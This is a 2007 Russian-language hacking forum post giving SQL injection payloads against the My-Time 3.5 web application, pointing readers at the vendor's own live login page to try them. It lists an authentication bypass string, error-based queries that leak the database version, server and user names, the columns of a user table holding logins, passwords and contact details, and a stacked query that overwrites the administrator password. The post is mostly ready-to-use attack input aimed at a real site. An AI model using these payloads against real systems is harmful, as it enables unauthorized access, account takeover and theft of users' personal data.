SQL-инъекция в My-Time<=3.5

Discussion in 'Веб-уязвимости' started by -=lebed=-, 27 Nov 2007.

  1. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Тестим на сайте производителя! www.irola.com
    _http://www.irola.com/mytime35/login.asp
    1. Обход авторизации:
    В поля ввода логин и пасс:
    Code:
    1' or 1=1--
    2. Смотрим системные переменные:
    Code:
    1' or 1=convert(int,@@version)--
    1' or 1=convert(int,@@servername)--
    1' or 1=convert(int,db_name())--
    1' or 1=convert(int,user_name())--
    1' or 1=convert(int,system_user)--
    3. Таблицы:
    Code:
    UserInfo.UserID
    UserInfo.Login
    UserInfo.Password
    UserInfo.UserNumber
    UserInfo.FirstName
    UserInfo.LastName
    UserInfo.TeamID
    UserInfo.Address
    UserInfo.City
    UserInfo.ZipCode
    UserInfo.CountryID
    UserInfo.Phone
    
    4. Меняем админский пароль:
    Code:
    -1' UPDATE UserInfo set Password= '1234' Where(UserID= '1');--
    
    aria-security.net​
     
    2 people like this.